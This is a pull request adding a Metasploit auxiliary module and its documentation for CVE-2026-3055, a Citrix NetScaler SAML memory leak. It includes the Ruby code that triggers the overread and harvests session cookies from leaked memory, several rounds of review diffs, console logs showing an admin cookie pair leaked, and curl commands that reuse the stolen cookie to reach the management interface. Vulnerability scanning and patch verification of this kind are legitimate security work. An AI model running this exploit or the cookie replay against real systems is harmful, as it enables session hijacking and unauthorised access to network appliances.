### PR TITLE
Add auxiliary scanner module for Citrix NetScaler memory leak (CVE-2026-3055)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
@@ -1,0 +1,151 @@
+## Vulnerable Application
+
+This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory from a
+target Citrix ADC server configured as a SAML IdP. The leaked memory is then scanned for session cookies
+which can be hijacked if found.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/scanner/http/citrix_netscaler_cve_2026_3055 `
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+You can check if the target is vulnerable. THe leaked data is not inspected. Intended to identify
+patched and vulnerable systems.
+
+6. `check`
+
+Run the module to leak data and potentially leak session cookies.
+
+7. `run`
+
+## Options
+
+- `LEAK_REQUEST_COUNT`: The number of HTTP requests to make to leak data. The more requests, the more data leaked, but
+also the longer the scan takes. Default is 4096.
+
+## Scenarios
+
+### Example 1
+
+Targeting a vulnerable `NS13.1: Build 59.19.nc` instance which has been configured as a SAML IdP. An admin session
+in the management interface was established separately, so we know a valid session is available to leak.
+
+```
+msf > use auxiliary/scanner/http/citrix_netscaler_cve_2026_3055 
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > show options 
+
+Module options (auxiliary/scanner/http/citrix_netscaler_cve_2026_3055):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   LEAK_REQUEST_COUNT  4096             yes       The number of HTTP requests per host to try and leak data
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, htt
+                                                  p, socks5, socks5h
+   RHOSTS                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                                  tml
+   RPORT               443              yes       The target port (TCP)
+   SSL                 true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI           /                yes       Base path
+   THREADS             1                yes       The number of concurrent threads (max one per host)
+   VHOST                                no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > set RHOST 192.168.86.141
+RHOST => 192.168.86.141
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > set RPORT 8443
+RPORT => 8443
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > check
+[*] 192.168.86.141:8443 - The target appears to be vulnerable. Response contains an NSC_TASS cookie.
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
+[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2368104 bytes, but did not leak any session cookies.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
+[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2358889 bytes, but did not leak any session cookies.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
+[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2049100 bytes, but did not leak any session cookies.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
+[+] 192.168.86.141:8443   - Leaked cookie pair: SESSID=5e43a6c810ddfa663a481c29aa3d012c; NITRO_SK=6LBvaEmhxTaJH7GGCXy3TPhRzu16tvEBzNyMWg7%2BGa8%3D
+[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 1797954 bytes, and 1 unique session cookies pairs.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) >
+```
+
+In the above example we leaked a `SESSID` cookie. If we know the IP address of the management interface (which may or may
+not be the same IP as the RHOST), we can verify teh session with a simple curl query. Below we see a GET request to
+`/menu/neo` without the cookie results in a redirect to an error page, while the same request with the leaked cookie
+returns a 200 OK and the expected HTML content.
+
+Alternatively, if we leak an `NSC_AAAC` session cookie, we can use it to access the user portal (which is
+the RHOST:RPORT web interface).
+
+```
+$ curl -ik https://192.168.86.140/menu/neo
+HTTP/1.1 307 Temporary Redirect
+Date: Mon, 30 Mar 2026 16:12:18 GMT
+Server: Apache
+X-Frame-Options: SAMEORIGIN
+Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' https://cdn-web.citrix.com/can.cdn/marketing/assets/fonts/citrix-fonts-linking.css; script-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src 'self'; img-src 'self' data: blob:; font-src 'self' data: https://cdn-web.citrix.com/can.cdn/marketing/assets/fonts/citrix-sans/; frame-ancestors 'self'; object-src 'none';
+Location: /menu/er?error=SESSION_CORRUPTED
+Feature-Policy: camera 'none'; microphone 'none'; geolocation 'none'
+Referrer-Policy: no-referrer
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Content-Length: 0
+Content-Type: text/html; charset=UTF-8
+
+$ curl -ik https://192.168.86.140/menu/neo --cookie "SESSID=5e43a6c810ddfa663a481c29aa3d012c; NITRO_SK=6LBvaEmhxTaJH7GGCXy3TPhRzu16tvEBzNyMWg7%2BGa8%3D"
+HTTP/1.1 200 OK
+Date: Mon, 30 Mar 2026 16:12:31 GMT
+Server: Apache
+X-Frame-Options: SAMEORIGIN
+Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' https://cdn-web.citrix.com/can.cdn/marketing/assets/fonts/citrix-fonts-linking.css https://citrix-adc-content.customer.pendo.io https://data.pendo.io https://pendo-static-6508245000126464.storage.googleapis.com https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-eval' https://app.pendo.io https://citrix-adc-data.customer.pendo.io https://citrix-adc-content.customer.pendo.io https://data.pendo.io https://pendo-static-6508245000126464.storage.googleapis.com https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' https://app.pendo.io https://s3.amazonaws.com; img-src 'self' data: blob: https://citrix-adc-content.customer.pendo.io https://citrix-adc-data.customer.pendo.io https://data.pendo.io https://pendo-static-6508245000126464.storage.googleapis.com https://pendo-static-5175857953112064.storage.googleapis.com; frame-src 'self' https://app.pendo.io; font-src 'self' data: https://cdn-web.citrix.com/can.cdn/marketing/assets/fonts/citrix-sans/; frame-ancestors 'self'; object-src 'none';
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Set-Cookie: startupapp=neo; expires=Thu, 25-Mar-2027 16:12:31 GMT; Max-Age=31104000; path=/; SameSite=Lax
+Feature-Policy: camera 'none'; microphone 'none'; geolocation 'none'
+Referrer-Policy: no-referrer
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Content-Length: 1531
+Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+<title>Citrix ADC VPX - Configuration</title>
+<link rel="icon" type="image/ico" href="/favicon.ico"/>
+<link href="/admin_ui/rdx/core/css/rdx.css" rel="stylesheet" type="text/css"/>
+<link href="/admin_ui/neo/css/neo.css" rel="stylesheet" type="text/css"/>
+<link href="/admin_ui/gui_v2/libs/rdx_v2/rdx_v2.css" rel="stylesheet" type="text/css"/>
+<!--[if IE]> <style type="text/css"> .form td input[type="submit"] { width: 50px; } </style> <![endif]-->
+<script type="text/javascript" src="/menu/neoglobaldata"></script>
+<script type="text/javascript" src="/admin_ui/rdx/core/js/cytoscape.umd.js"></script>
+<script type="text/javascript" src="/admin_ui/rdx/core/js/rdx.js"></script>
+<script type="text/javascript" src="/menu/branding"></script>
+<script type="text/javascript" src="/admin_ui/neo/js/neo.js"></script>
+<script type="text/javascript" src="/admin_ui/gui_v2/libs/rdx_v2/rdx_v2.js"></script>
+<script type="text/javascript" src="/admin_ui/gui_v2/configuration/ssl_bundle.js"></script>
+<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_win.js"></script>
+<script type="text/javascript" src="/admin_ui/neo/js/epa_expression_data_mac.js"></script>
+</head>
+<body class="ns_body">
+</body>
+</html>
+```

--- a/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
@@ -26,9 +26,12 @@ Run the module to leak data and potentially leak session cookies.
 
 ## Options
 
-- `LEAK_REQUEST_COUNT`: The number of HTTP requests to make to leak data. The more requests, the more data leaked, but
-also the longer the scan takes. Default is 4096.
+- `LEAK_REQUEST_COUNT`: The number of HTTP requests per host to try and leak data when exploiting the vulnerability.
+The more requests, the more data leaked, but also the longer the scan takes. Default is 4096.
 
+- `CHECK_REQUEST_COUNT`: The maximum number of HTTP requests per host to try and leak data when checking for the
+vulnerability. Default is 4.
+ 
 ## Scenarios
 
 ### Example 1
@@ -44,7 +47,8 @@ Module options (auxiliary/scanner/http/citrix_netscaler_cve_2026_3055):
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   LEAK_REQUEST_COUNT  4096             yes       The number of HTTP requests per host to try and leak data
+   LEAK_REQUEST_COUNT  4096             yes       The number of HTTP requests per host to try and leak data when exploiting the vulnerability
+   CHECK_REQUEST_COUNT 4                yes       The maximum number of HTTP requests per host to try and leak data when checking for the vulnerability
    Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, htt
                                                   p, socks5, socks5h
    RHOSTS                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h

--- a/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
@@ -85,7 +85,7 @@ msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) >
 ```
 
 In the above example we leaked a `SESSID` cookie. If we know the IP address of the management interface (which may or may
-not be the same IP as the RHOST), we can verify teh session with a simple curl query. Below we see a GET request to
+not be the same IP as the RHOST), we can verify the session with a simple curl query. Below we see a GET request to
 `/menu/neo` without the cookie results in a redirect to an error page, while the same request with the leaked cookie
 returns a 200 OK and the expected HTML content.
 

--- a/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.md
@@ -15,7 +15,7 @@ Configure the target:
 4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
 5. `set SSL true` (Or set to false if targeting HTTP)
 
-You can check if the target is vulnerable. THe leaked data is not inspected. Intended to identify
+You can check if the target is vulnerable. The leaked data is not inspected. Intended to identify
 patched and vulnerable systems.
 
 6. `check`

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       # A vulnerable host will return 302, but may occasionally return a 200 error, we test for this and keep
-      # going if we see teh 200 error, otherwise we bail out early.
+      # going if we see the 200 error, otherwise we bail out early.
       unless res.code == 302
         vprint_error("#{peer} - Unexpected response code #{res.code}")
 

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
     # We track the number of bytes we leak to report back to teh user and help determine if we triggered the vuln or not.
     leaked_data_count = 0
 
-    # We use a set to track the unique leaked cookies, so we dont report leaking the same cookie numerous times.
+    # We use a set to track the unique leaked cookies, so we don't report leaking the same cookie numerous times.
     found_cookies = Set.new
 
     # As we cannot control what we leak, we hit the vuln up to LEAK_REQUEST_COUNT times and hope that we leak
@@ -113,6 +113,7 @@ class MetasploitModule < Msf::Auxiliary
 
       # The leaked data comes back to us in a Set-Cookie header, so we bail out early if no cookies are returned.
       # This will handle a patched appliance.
+      # Note: A patched system will not return any cookie values.
       cookies = res.get_cookies
       if cookies.empty?
         vprint_error("#{peer} - Response has no cookies")
@@ -134,8 +135,6 @@ class MetasploitModule < Msf::Auxiliary
 
         bytes = Rex::Text.decode_base64(v)
 
-        # A patched system will not return a base64 encoded NSC_TASS value, so if we can decode it, it's a strong
-        # indicator of a vulnerable system. Even if the memory we leak doesn't contain session cookies.
         leaked_data_count += bytes.bytesize
 
         # Detect the SESSID and optional NITRO_SK cookie pair. The SESSID value is a hex string, while the NITRO_SK

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -176,7 +176,8 @@ class MetasploitModule < Msf::Auxiliary
       if found_cookies.empty?
         message += ', but did not leak any session cookies.'
       else
-        message += ", and #{found_cookies.size} unique session cookies pairs."
+        cookie_word = found_cookies.size == 1 ? 'session cookie' : 'session cookies'
+        message += ", and #{found_cookies.size} unique #{cookie_word}."
       end
 
       print_status("#{peer} - #{message}")

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Auxiliary
         next unless k == 'NSC_TASS'
 
         # Validate an NSC_TASS cookie value is well-formed base64 before attempting to decode it.
-        unless v.match?(%r{\A[A-Za-z0-9+/]*={0,2}\z})
+        unless v.match?(%r{\A[A-Za-z0-9+/]+={0,2}\z})
           vprint_error("#{peer} - NSC_TASS cookie value is not valid base64: #{v}")
           next
         end

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(_target_host)
-    # We track the number of bytes we leak to report back to teh user and help determine if we triggered the vuln or not.
+    # We track the number of bytes we leak to report back to the user and help determine if we triggered the vuln or not.
     leaked_data_count = 0
 
     # We use a set to track the unique leaked cookies, so we don't report leaking the same cookie numerous times.

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # As we cannot control what we leak, we hit the vuln up to LEAK_REQUEST_COUNT times and hope that we leak
     # something useful during one of those attempts.
-    0.upto(datastore['LEAK_REQUEST_COUNT']) do
+    datastore['LEAK_REQUEST_COUNT'].times do
       # Trigger CVE-2026-3055...
       res = send_request_cgi(
         'method' => 'GET',

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -126,6 +126,12 @@ class MetasploitModule < Msf::Auxiliary
       key_vals.each do |k, v|
         next unless k == 'NSC_TASS'
 
+        # Validate an NSC_TASS cookie value is well-formed base64 before attempting to decode it.
+        unless v.match?(%r{\A[A-Za-z0-9+/]*={0,2}\z})
+          vprint_error("#{peer} - NSC_TASS cookie value is not valid base64: #{v}")
+          next
+        end
+
         bytes = Rex::Text.decode_base64(v)
 
         # A patched system will not return a base64 encoded NSC_TASS value, so if we can decode it, it's a strong

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -64,11 +64,16 @@ class MetasploitModule < Msf::Auxiliary
 
     cookies = res.get_cookies
 
+    # A patched system will not return any cookie values.
     return Exploit::CheckCode::Safe('Response has no cookies') if cookies.empty?
 
     return Exploit::CheckCode::Safe('Response has no NSC_TASS cookie') unless cookies.include? 'NSC_TASS='
 
-    Exploit::CheckCode::Appears('Response contains an NSC_TASS cookie.')
+    # We report vulnerable, as by here an unpatched system will be leaking memory in the NSC_TASS cookie, while
+    # a patched system will not return any cookies at all.
+    report_vuln
+
+    Exploit::CheckCode::Vulnerable('Response contains an NSC_TASS cookie.')
   end
 
   def run_host(_target_host)

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -1,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix ADC (NetScaler) CVE-2026-3055 Scanner',
+        'Description' => %q{
+          This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory from a
+          target Citrix ADC server configured as a SAML IdP. The leaked memory is then scanned for session cookies
+          which can be hijacked if found.
+        },
+        'Author' => [
+          'watchTowr', # Original technical analysis and PoC for CVE-2026-3055
+          'sfewer-r7' # Metasploit module for CVE-2026-3055, based on the watchTowr PoC and Spencer McIntyre's module for CVE-2023-4966.
+        ],
+        'References' => [
+          ['CVE', '2026-3055'],
+          ['URL', 'https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/'],
+          ['URL', 'https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/']
+        ],
+        'DisclosureDate' => '2026-03-23',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/']),
+        OptInt.new('LEAK_REQUEST_COUNT', [true, 'The number of HTTP requests per host to try and leak data', 4096]),
+      ]
+    )
+  end
+
+  def check_host(_target_host)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wsfed', 'passive'),
+      'headers' => {
+        'Host' => Rex::Text.rand_text_alpha(128)
+      },
+      'vars_get' => {
+        'wctx' => nil
+      }
+    )
+    return Exploit::CheckCode::Unknown('Connection failed') unless res
+
+    return Exploit::CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 302
+
+    cookies = res.get_cookies
+
+    return Exploit::CheckCode::Safe('Response has no cookies') if cookies.empty?
+
+    return Exploit::CheckCode::Safe('Response has no NSC_TASS cookie') unless cookies.include? 'NSC_TASS='
+
+    Exploit::CheckCode::Appears('Response contains an NSC_TASS cookie.')
+  end
+
+  def run_host(_target_host)
+    # We track the number of bytes we leak to report back to teh user and help determine if we triggered the vuln or not.
+    leaked_data_count = 0
+
+    # We use a set to track the unique leaked cookies, so we dont report leaking the same cookie numerous times.
+    found_cookies = Set.new
+
+    # As we cannot control what we leak, we hit the vuln up to LEAK_REQUEST_COUNT times and hope that we leak
+    # something useful during one of those attempts.
+    0.upto(datastore['LEAK_REQUEST_COUNT']) do
+      # Trigger CVE-2026-3055...
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'wsfed', 'passive'),
+        'headers' => {
+          'Host' => Rex::Text.rand_text_alpha(128)
+        },
+        'vars_get' => {
+          'wctx' => nil
+        }
+      )
+
+      # Bail out early if the connection fails for this host
+      unless res
+        vprint_error("#{peer} - Connection failed")
+        break
+      end
+
+      # A vulnerable host will return 302, but may occasionally return a 200 error, we test for this and keep
+      # going if we see teh 200 error, otherwise we bail out early.
+      unless res.code == 302
+        vprint_error("#{peer} - Unexpected response code #{res.code}")
+
+        # If has been observed that some request generate a 200 response for a SAML error. We can continue
+        # trying to leak data rather than bail out early.
+        next if res.code == 200 && res.body == 'Undefined SAML error'
+
+        break
+      end
+
+      # The leaked data comes back to us in a Set-Cookie header, so we bail out early if no cookies are returned.
+      # This will handle a patched appliance.
+      cookies = res.get_cookies
+      if cookies.empty?
+        vprint_error("#{peer} - Response has no cookies")
+        break
+      end
+
+      # For every cookie returned, iterate over its key value pair and look for the NSC_TASS cookies which will
+      # contain the leaked memory (base64 encoded)
+      key_vals = cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)
+
+      key_vals.each do |k, v|
+        next unless k == 'NSC_TASS'
+
+        bytes = Rex::Text.decode_base64(v)
+
+        # A patched system will not return a base64 encoded NSC_TASS value, so if we can decode it, it's a strong
+        # indicator of a vulnerable system. Even if the memory we leak doesn't contain session cookies.
+        leaked_data_count += bytes.bytesize
+
+        # Detect the SESSID and optional NITRO_SK cookie pair. The SESSID value is a hex string, while the NITRO_SK
+        # value is URL-encoded base64. The two cookies may appear in either order in the leaked data. These cookies
+        # are from the management interface. Note, the management interface may or may not be bound to the same RHOST IP
+        # address we are targeting, that depends on the appliance configuration. We can still leak it as its all in
+        # memory either way, but we may not be able to reuse it if we cant access the management interface.
+        bytes.scan(/SESSID=([0-9a-f]{32})/i).each do |match|
+          sessid_value = match.first
+
+          next if found_cookies.include?("SESSID=#{sessid_value}")
+
+          found_cookies.add("SESSID=#{sessid_value}")
+
+          nitro_sk_match = bytes.match(/NITRO_SK=([^\s;,]+)/i)
+
+          if nitro_sk_match
+            nitro_sk_value = nitro_sk_match[1]
+
+            print_good("#{peer} - Leaked cookie pair: SESSID=#{sessid_value}; NITRO_SK=#{nitro_sk_value}")
+          else
+            print_good("#{peer} - Leaked cookie: SESSID=#{sessid_value}")
+          end
+        end
+
+        # Detect NSC_AAAC cookies independently of the SESSID/NITRO_SK pair.
+        bytes.scan(/NSC_AAAC=([0-9a-f]{32,64})/i).each do |match|
+          nsc_aaac_value = match.first
+
+          next if found_cookies.include?("NSC_AAAC=#{nsc_aaac_value}")
+
+          found_cookies.add("NSC_AAAC=#{nsc_aaac_value}")
+
+          print_good("#{peer} - Leaked cookie: NSC_AAAC=#{nsc_aaac_value}")
+        end
+      end
+    rescue Errno::ECONNRESET
+      # It was observed that the server may reset the connection when activity on the management interface is occurring.
+      vprint_warning("#{peer} - Connection reset")
+    end
+
+    if leaked_data_count > 0
+      message = "The target is vulnerable. Leaked #{leaked_data_count} bytes"
+      if found_cookies.empty?
+        message += ', but did not leak any session cookies.'
+      else
+        message += ", and #{found_cookies.size} unique session cookies pairs."
+      end
+
+      print_status("#{peer} - #{message}")
+
+      report_vuln
+    else
+      print_status("#{peer} - The target does not appear vulnerable.")
+    end
+  end
+
+  def report_vuln
+    super(
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references
+    )
+  end
+end

--- a/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
+++ b/modules/auxiliary/scanner/http/citrix_netscaler_cve_2026_3055.rb
@@ -42,38 +42,48 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Base path', '/']),
-        OptInt.new('LEAK_REQUEST_COUNT', [true, 'The number of HTTP requests per host to try and leak data', 4096]),
+        OptInt.new('LEAK_REQUEST_COUNT', [true, 'The number of HTTP requests per host to try and leak data when exploiting the vulnerability', 4096]),
+        OptInt.new('CHECK_REQUEST_COUNT', [true, 'The maximum number of HTTP requests per host to try and leak data when checking for the vulnerability', 4]),
       ]
     )
   end
 
   def check_host(_target_host)
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'wsfed', 'passive'),
-      'headers' => {
-        'Host' => Rex::Text.rand_text_alpha(128)
-      },
-      'vars_get' => {
-        'wctx' => nil
-      }
-    )
-    return Exploit::CheckCode::Unknown('Connection failed') unless res
+    datastore['CHECK_REQUEST_COUNT'].times do
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'wsfed', 'passive'),
+        'headers' => {
+          'Host' => Rex::Text.rand_text_alpha(128)
+        },
+        'vars_get' => {
+          'wctx' => nil
+        }
+      )
 
-    return Exploit::CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 302
+      return Exploit::CheckCode::Unknown('Connection failed') unless res
 
-    cookies = res.get_cookies
+      # If has been observed that some requests generate a 200 response for a SAML error. We can continue
+      # trying to leak data rather than bail out early.
+      next if res.code == 200 && res.body == 'Undefined SAML error'
 
-    # A patched system will not return any cookie values.
-    return Exploit::CheckCode::Safe('Response has no cookies') if cookies.empty?
+      return Exploit::CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 302
 
-    return Exploit::CheckCode::Safe('Response has no NSC_TASS cookie') unless cookies.include? 'NSC_TASS='
+      cookies = res.get_cookies
 
-    # We report vulnerable, as by here an unpatched system will be leaking memory in the NSC_TASS cookie, while
-    # a patched system will not return any cookies at all.
-    report_vuln
+      # A patched system will not return any cookie values.
+      return Exploit::CheckCode::Safe('Response has no cookies') if cookies.empty?
 
-    Exploit::CheckCode::Vulnerable('Response contains an NSC_TASS cookie.')
+      return Exploit::CheckCode::Safe('Response has no NSC_TASS cookie') unless cookies.include? 'NSC_TASS='
+
+      # We report vulnerable, as by here an unpatched system will be leaking memory in the NSC_TASS cookie, while
+      # a patched system will not return any cookies at all.
+      report_vuln
+
+      return Exploit::CheckCode::Vulnerable('Response contains an NSC_TASS cookie.')
+    end
+
+    Exploit::CheckCode::Unknown
   end
 
   def run_host(_target_host)
@@ -109,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
       unless res.code == 302
         vprint_error("#{peer} - Unexpected response code #{res.code}")
 
-        # If has been observed that some request generate a 200 response for a SAML error. We can continue
+        # If has been observed that some requests generate a 200 response for a SAML error. We can continue
         # trying to leak data rather than bail out early.
         next if res.code == 200 && res.body == 'Undefined SAML error'
 


### PR DESCRIPTION
## Overview
This auxiliary module exploits CVE-2026-3055, an info leak in Citrix NetScaler (when configured as an SAML IdP). Similar to the other CitrixBleed vulns, we can leak memory and potentially discover session cookies.

This module is based upon the technical analysis published by watchTowr: https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

## Example
Targeting a vulnerable `NS13.1: Build 59.19.nc` instance which has been configured as a SAML IdP. An admin session
in the management interface was established separately, so we know that a valid session is available to leak.

```
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > set RHOST 192.168.86.141
RHOST => 192.168.86.141
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > set RPORT 8443
RPORT => 8443
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > check
[*] 192.168.86.141:8443 - The target appears to be vulnerable. Response contains an NSC_TASS cookie.
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2368104 bytes, but did not leak any session cookies.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2358889 bytes, but did not leak any session cookies.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 2049100 bytes, but did not leak any session cookies.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) > run
[+] 192.168.86.141:8443   - Leaked cookie pair: SESSID=5e43a6c810ddfa663a481c29aa3d012c; NITRO_SK=6LBvaEmhxTaJH7GGCXy3TPhRzu16tvEBzNyMWg7%2BGa8%3D
[*] 192.168.86.141:8443   - The target is vulnerable. Leaked 1797954 bytes, and 1 unique session cookies pairs.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/citrix_netscaler_cve_2026_3055) >
```